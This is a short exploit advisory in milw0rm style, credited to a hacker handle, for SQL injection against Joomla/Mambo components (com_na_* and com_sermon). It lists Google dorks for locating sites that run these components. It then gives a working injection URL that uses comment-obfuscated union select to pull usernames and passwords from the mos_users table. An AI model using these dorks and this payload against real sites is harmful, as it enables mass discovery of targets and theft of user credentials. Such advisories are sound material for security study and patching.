######################################################################### # # netadvantist@copyright 2006 SQL Injection(com_na_xxx) # ######################################################################### # # AUTHOR : S@BUN # # HOME : http://www.hackturkiye.com # ######################################################################### # # DORKS 1 : allinurl:"com_na_content" # # DORK 2 : allinurl:"com_na_bible" # # DORKS 3 : allinurl:"com_na_events" # # DORKS 4 : allinurl:"com_na_content" # # DORKS 5 : allinurl:"com_na_feedback" # # DORKS 6 : allinurl:"com_na_mydocs" # # DORKS 7 : allinurl:"com_na_churchmap" # # DORKS 8 : allinurl:"com_na_bibleinfo" # # DORKS 9 : allinurl:"com_na_dbs" # # DORKS 10 : allinurl:"com_na_udm" # # DORKS 11 : allinurl:"com_na_qforms" # # DORKS 12 : allinurl:"com_na_gallery2" # # DORKS 13 : allinurl:"com_na_publicrss" # # DORKS 13 : allinurl:"index.php?kwd" # ########################################################################## EXPLOİT: index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,password%2C0%2C0%2C0/**/from/**/mos_users/* ########################################################################## # S@BUN www.hackturkiye.com S@BUN ########################################################################## # S@BUN i AM NOT HACKER S@BUN ########################################################################## side notes: Sermon 12 JAN 2006 Isai Michel L. GNU/GPL isai@isaim.com www.isaim.com 0.2 # milw0rm.com [2008-02-07]